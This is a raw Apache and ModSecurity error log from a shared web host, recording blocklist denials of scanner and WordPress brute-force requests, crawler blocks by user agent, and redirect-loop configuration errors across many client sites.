[Tue May 26 18:21:54.612601 2026] [security2:error] [pid 983082:tid 983253] [client 23.100.97.57:2811] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/wp.php"] [unique_id "ahWXarvhpIlZJOtze4tNUAAAAK4"]
[Tue May 26 18:21:54.852445 2026] [security2:error] [pid 983082:tid 983256] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXabvhpIlZJOtze4tNMAAAALE"]
[Tue May 26 18:21:55.165360 2026] [security2:error] [pid 983082:tid 983332] [client 23.100.97.57:3751] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/worksec.php"] [unique_id "ahWXa7vhpIlZJOtze4tNVgAAAP0"]
[Tue May 26 18:21:55.630115 2026] [security2:error] [pid 983082:tid 983226] [client 177.145.44.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXarvhpIlZJOtze4tNRAAAAJM"]
[Tue May 26 18:21:55.726260 2026] [core:error] [pid 983082:tid 983214] [client 155.212.108.224:60149] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:21:55.726279 2026] [core:error] [pid 983082:tid 983214] [client 155.212.108.224:60149] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:21:55.733442 2026] [security2:error] [pid 983082:tid 983266] [client 23.100.97.57:5632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/wp-themes.php"] [unique_id "ahWXa7vhpIlZJOtze4tNYwAAALs"]
[Tue May 26 18:21:56.309267 2026] [security2:error] [pid 983082:tid 983287] [client 23.100.97.57:10441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/wp-signin.php"] [unique_id "ahWXbLvhpIlZJOtze4tNbAAAANA"]
[Tue May 26 18:21:56.708609 2026] [security2:error] [pid 983082:tid 983255] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXa7vhpIlZJOtze4tNWQAAALA"]
[Tue May 26 18:21:56.856188 2026] [security2:error] [pid 983082:tid 983248] [client 23.100.97.57:2760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/wp-blog-header.php"] [unique_id "ahWXbLvhpIlZJOtze4tNfAAAAKk"]
[Tue May 26 18:21:56.862377 2026] [security2:error] [pid 983082:tid 983187] [remote 141.95.202.18:35430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXbLvhpIlZJOtze4tNdAAAvmg"]
[Tue May 26 18:21:57.112332 2026] [security2:error] [pid 983082:tid 983086] [remote 141.95.202.18:35430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXbbvhpIlZJOtze4tNgQAA7AM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:21:57.240691 2026] [core:error] [pid 983082:tid 983339] [client 155.212.108.224:13643] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:21:57.240709 2026] [core:error] [pid 983082:tid 983339] [client 155.212.108.224:13643] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:21:57.989846 2026] [security2:error] [pid 983082:tid 983220] [client 85.208.96.203:33936] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/9/"] [unique_id "ahWXbbvhpIlZJOtze4tNnwAAAI0"]
[Tue May 26 18:21:57.989980 2026] [security2:error] [pid 983082:tid 983220] [client 85.208.96.203:33936] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/9/"] [unique_id "ahWXbbvhpIlZJOtze4tNnwAAAI0"]
[Tue May 26 18:21:58.014110 2026] [security2:error] [pid 983082:tid 983325] [client 23.100.97.57:7223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/ws.php"] [unique_id "ahWXbrvhpIlZJOtze4tNoQAAAPY"]
[Tue May 26 18:21:58.573013 2026] [security2:error] [pid 983082:tid 983248] [client 23.100.97.57:10622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/wsa.php"] [unique_id "ahWXbrvhpIlZJOtze4tNqgAAAKk"]
[Tue May 26 18:21:59.099620 2026] [security2:error] [pid 983082:tid 983221] [client 23.100.97.57:7918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/w.php"] [unique_id "ahWXb7vhpIlZJOtze4tNuwAAAI4"]
[Tue May 26 18:21:59.636434 2026] [security2:error] [pid 983082:tid 983212] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXbrvhpIlZJOtze4tNqQAAAIU"]
[Tue May 26 18:21:59.649835 2026] [security2:error] [pid 983082:tid 983250] [client 23.100.97.57:3399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/x.php"] [unique_id "ahWXb7vhpIlZJOtze4tNxgAAAKs"]
[Tue May 26 18:22:00.189868 2026] [security2:error] [pid 983082:tid 983236] [client 23.100.97.57:13216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/xx.php"] [unique_id "ahWXcLvhpIlZJOtze4tN0AAAAJ0"]
[Tue May 26 18:22:01.164141 2026] [security2:error] [pid 983082:tid 983297] [client 23.100.97.57:4255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/xmlrpc.php"] [unique_id "ahWXcLvhpIlZJOtze4tN1gAAANo"]
[Tue May 26 18:22:01.537617 2026] [security2:error] [pid 983082:tid 983241] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXcbvhpIlZJOtze4tN3QAAAKI"]
[Tue May 26 18:22:01.739748 2026] [security2:error] [pid 983082:tid 983312] [client 23.100.97.57:3095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/y.php"] [unique_id "ahWXcbvhpIlZJOtze4tN_wAAAOk"]
[Tue May 26 18:22:02.618774 2026] [core:error] [pid 983082:tid 983279] [client 155.212.108.224:60003] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:22:02.618795 2026] [core:error] [pid 983082:tid 983279] [client 155.212.108.224:60003] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:22:03.264168 2026] [security2:error] [pid 983082:tid 983230] [client 130.12.182.68:55452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.182.12.130.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-login.php"] [unique_id "ahWXcrvhpIlZJOtze4tOEQAAAJc"], referer: https://mexicoimportaciones.com/wp-admin/
[Tue May 26 18:22:04.237601 2026] [core:error] [pid 983082:tid 983253] [client 155.212.108.224:40759] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:22:04.237650 2026] [core:error] [pid 983082:tid 983253] [client 155.212.108.224:40759] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:22:04.576583 2026] [security2:error] [pid 983082:tid 983322] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXc7vhpIlZJOtze4tOHQAAAPM"]
[Tue May 26 18:22:05.471089 2026] [security2:error] [pid 983082:tid 983259] [client 155.212.108.224:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahWXdbvhpIlZJOtze4tOOgAAALQ"], referer: https://www.google.com
[Tue May 26 18:22:05.474561 2026] [security2:error] [pid 983082:tid 983288] [client 47.128.30.21:18100] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "omshriinfrastructures.com"] [uri "/robots.txt"] [unique_id "ahWXdbvhpIlZJOtze4tOQgAAANE"]
[Tue May 26 18:22:07.118500 2026] [security2:error] [pid 983082:tid 983240] [client 74.7.244.29:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.tedxnutm.org.ng.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWXdrvhpIlZJOtze4tOVwAAAKE"]
[Tue May 26 18:22:07.119381 2026] [security2:error] [pid 983082:tid 983286] [client 74.7.244.29:33430] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.tedxnutm.org.ng.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahWXdrvhpIlZJOtze4tOVQAAzxk"]
[Tue May 26 18:22:07.303638 2026] [core:error] [pid 983082:tid 983249] [client 155.212.108.224:47547] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:22:07.303659 2026] [core:error] [pid 983082:tid 983249] [client 155.212.108.224:47547] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:22:07.545711 2026] [security2:error] [pid 983082:tid 983224] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXdrvhpIlZJOtze4tOVAAAAJE"]
[Tue May 26 18:22:07.904814 2026] [security2:error] [pid 983082:tid 983114] [remote 47.128.60.247:40982] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "m2wealthadvisor.com"] [uri "/about-us/index.html"] [unique_id "ahWXd7vhpIlZJOtze4tOeAAA6h8"]
[Tue May 26 18:22:08.420019 2026] [core:error] [pid 983082:tid 983237] [client 155.212.108.224:54801] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:22:08.420041 2026] [core:error] [pid 983082:tid 983237] [client 155.212.108.224:54801] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:22:09.234416 2026] [core:error] [pid 983082:tid 983228] [client 155.212.108.224:26901] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:22:09.234439 2026] [core:error] [pid 983082:tid 983228] [client 155.212.108.224:26901] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:22:09.319189 2026] [security2:error] [pid 983082:tid 983289] [client 136.116.122.134:52615] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "anujtradingco.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWXebvhpIlZJOtze4tOlgAAANI"]
[Tue May 26 18:22:09.496300 2026] [security2:error] [pid 983082:tid 983331] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXeLvhpIlZJOtze4tOggAAAPw"]
[Tue May 26 18:22:09.884614 2026] [security2:error] [pid 983082:tid 983227] [client 143.44.192.7:39912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.192.44.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rabbanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahWXebvhpIlZJOtze4tOngAAAJQ"]
[Tue May 26 18:22:09.884791 2026] [security2:error] [pid 983082:tid 983227] [client 143.44.192.7:39912] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "rabbanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahWXebvhpIlZJOtze4tOngAAAJQ"]
[Tue May 26 18:22:10.110575 2026] [core:error] [pid 983082:tid 983285] [client 155.212.108.224:49135] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:22:10.110662 2026] [core:error] [pid 983082:tid 983285] [client 155.212.108.224:49135] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.google.com
[Tue May 26 18:22:10.432564 2026] [security2:error] [pid 983082:tid 983313] [client 35.252.131.78:64599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.131.252.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahWXervhpIlZJOtze4tOsAAAAOo"]
[Tue May 26 18:22:10.432740 2026] [security2:error] [pid 983082:tid 983313] [client 35.252.131.78:64599] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahWXervhpIlZJOtze4tOsAAAAOo"]
[Tue May 26 18:22:10.793872 2026] [security2:error] [pid 983082:tid 983117] [remote 74.91.224.220:44606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXervhpIlZJOtze4tOvQAAliI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:22:12.036065 2026] [security2:error] [pid 983082:tid 983235] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXervhpIlZJOtze4tOvAAAAJw"]
[Tue May 26 18:22:12.789241 2026] [security2:error] [pid 983082:tid 983285] [client 136.116.122.134:56273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.122.116.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahWXfLvhpIlZJOtze4tO5QAAAM4"]
[Tue May 26 18:22:12.789430 2026] [security2:error] [pid 983082:tid 983285] [client 136.116.122.134:56273] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahWXfLvhpIlZJOtze4tO5QAAAM4"]
[Tue May 26 18:22:14.295248 2026] [security2:error] [pid 983082:tid 983304] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXfLvhpIlZJOtze4tO7gAAAOE"]
[Tue May 26 18:22:15.823837 2026] [security2:error] [pid 983082:tid 983102] [remote 103.230.156.120:45312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXf7vhpIlZJOtze4tPIwAAvxM"]
[Tue May 26 18:22:18.573542 2026] [security2:error] [pid 983082:tid 983279] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXgLvhpIlZJOtze4tPLwAAAMg"]
[Tue May 26 18:22:19.380430 2026] [security2:error] [pid 983082:tid 983286] [client 208.91.198.85:42886] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWXgbvhpIlZJOtze4tPQgAAAM8"]
[Tue May 26 18:22:19.473835 2026] [security2:error] [pid 983082:tid 983248] [client 45.148.10.16:60290] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.eiyei.com.md-74.webhostbox.net"] [uri "/"] [unique_id "ahWXg7vhpIlZJOtze4tPYAAAAKk"]
[Tue May 26 18:22:20.209273 2026] [autoindex:error] [pid 983082:tid 983235] [client 129.226.217.17:51216] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:22:20.317166 2026] [security2:error] [pid 983082:tid 983332] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXgrvhpIlZJOtze4tPUQAAAP0"]
[Tue May 26 18:22:22.340276 2026] [security2:error] [pid 983082:tid 983275] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXhbvhpIlZJOtze4tPgAAAAMQ"]
[Tue May 26 18:22:23.711041 2026] [security2:error] [pid 983082:tid 983330] [client 114.119.143.151:41745] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/episodes/more-than-just-baby-blues-the-struggle-series/"] [unique_id "ahWXh7vhpIlZJOtze4tPqgAAAPs"], referer: https://preetishah.com/episodes/a-dwindling-sparkle-the-struggle-series/
[Tue May 26 18:22:25.230364 2026] [security2:error] [pid 983082:tid 983220] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXh7vhpIlZJOtze4tPrQAAAI0"]
[Tue May 26 18:22:25.613374 2026] [security2:error] [pid 983082:tid 983232] [client 14.232.125.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXiLvhpIlZJOtze4tPswAAAJk"]
[Tue May 26 18:22:25.743784 2026] [core:error] [pid 983082:tid 983225] [client 198.235.24.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:22:25.743814 2026] [core:error] [pid 983082:tid 983225] [client 198.235.24.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
